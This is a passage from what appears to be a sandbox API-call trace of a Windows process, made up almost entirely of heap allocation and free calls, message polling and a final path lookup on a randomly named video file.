hHeap=0x1780000) returned 1 [0097.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0097.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0097.895] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0097.895] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.896] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0097.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0097.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0097.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0097.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0097.896] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3b8 [0097.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0097.896] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0097.896] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0097.897] FreeLibrary (hLibModule=0x756e0000) returned 1 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0097.897] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0097.897] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.897] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0097.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0097.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0097.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.897] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0097.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0097.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0097.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0097.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0097.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca340 [0097.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0097.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0097.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0097.898] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0097.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0097.898] CloseHandle (hObject=0x298) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ed3b0 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0097.899] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0097.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0097.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0097.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0097.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0097.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0097.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0097.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0097.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0097.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca448 [0097.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0097.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0097.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0097.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0097.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0097.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0097.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0097.900] CloseHandle (hObject=0x258) returned 1 [0097.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0097.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0097.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0097.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0097.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0097.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0097.904] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0097.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0097.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0097.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0097.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0097.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0097.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0097.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0097.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0097.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0097.905] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0097.911] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0097.912] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0097.913] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0097.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0097.914] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0097.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0097.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0097.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0097.914] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0097.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0097.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0097.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0097.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0097.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0097.914] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0097.914] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\8PG6kQ2SW4h7w.flv", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\8PG6kQ2SW4h7w.flv", lpFilePart=0x0) returned 0x37 